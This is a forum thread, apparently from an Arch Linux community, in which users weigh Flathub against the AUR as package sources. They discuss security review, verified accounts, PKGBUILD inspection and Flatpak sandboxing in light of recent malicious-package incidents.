Another question just came up during my big laptop package cleanup… Due to the latest attacks against node/npm, malicious packages in AUR (I from now on check PKGBUILD before giving it a go - I swear!), I try to get as much as possible from core/extra and install stuff that I really need from other resources/repos. Delete the rest after testing or after a temporary period of usage.
I now could boil down my AUR packages to <10. Flatpak number is 5 (could not find elsewhere)
Question now is:
Is flathub a more reliable source for packages than AUR? Especially for less popular packages? Can I rely on a kind of audit from flathub? Or is it the community on both sides, that takes care of security?
Thanks for any ideas/thoughts - have a nice Sunday
Flathub has the same problem as the AUR, anyone can upload anything, although Flathub has verified accounts which should be safer. As the XZ incident showed, this is not necessarily true though.
I’ve never needed to use Flatpak’s. The few times the AUR has been down has been a minor inconvenience but hasn’t halted my personal production of anything. I also don’t rely on a lot of packages from the AUR just the few I can’t get in the normal Repo’s.
With all that said Each case is very different. At the end of the day it comes to YOUR needs. Arch is all about using the tool one needs to get the job done.
If flatpaks are maintained by the devs themthelves I tend to use flatpak nowadays, sometimes flatpak is the only official option anyway.
In case both options are given, I tend to use flatpak if the app has to be up to date all the time. Flatpaks often are faster maintained than the official repos or the AUR. Dispite not being in the AUR but in the official repos, discord is a good example. Most of the time the repos aren’t updated fast enough.
On packages that are maintained by 3rd party maintainers as a whole I tend to use AUR, cause I can have a look in the pkgbuild first, pre installation.
Everybody can make a request to be hosted on Flathub, which is then reviewed by humans and has to fulfill some quality standards and technical requirements.
Interesting, it seems it’s a lot safer than I thought but I do wonder how much they are checking the code for a submitted flatpak for maliciousness as it would be a hell of a lot of work keeping up with that.
There has been many threads here about AUR, flatpak, and other package sources.
For example: Flatpak vs AUR?
AUR has the advantage that you have the opportunity to check how the package will be created. But of course you need to know a few things about software in order to do the check.
Flatpak can’t check the actual project code, that would be an impossible effort. They do what every other distro incl. Arch does: Provide some level of trust to ship what was provided as source upstream. Whatever was or wasn’t maliciously done on the source level is a different question.
But if something goes horribly wrong on the source level then flatpak offers at least the last line of defense of everything running somewhat sandboxed. With Arch (or the AUR) everything user accessible would essentially be game over.
PS: For the same reason I sometimes prefer flatpak over AUR or even Arch packages. I don’t know what spotify or discord ship in their binary blobs, I rather have them in the flatpak sandbox. Same goes for packages that load 3rd party plugins like e.g. Obsidian. Let’s be honest, most of us don’t deploy apparmor and co. and just run things raw.
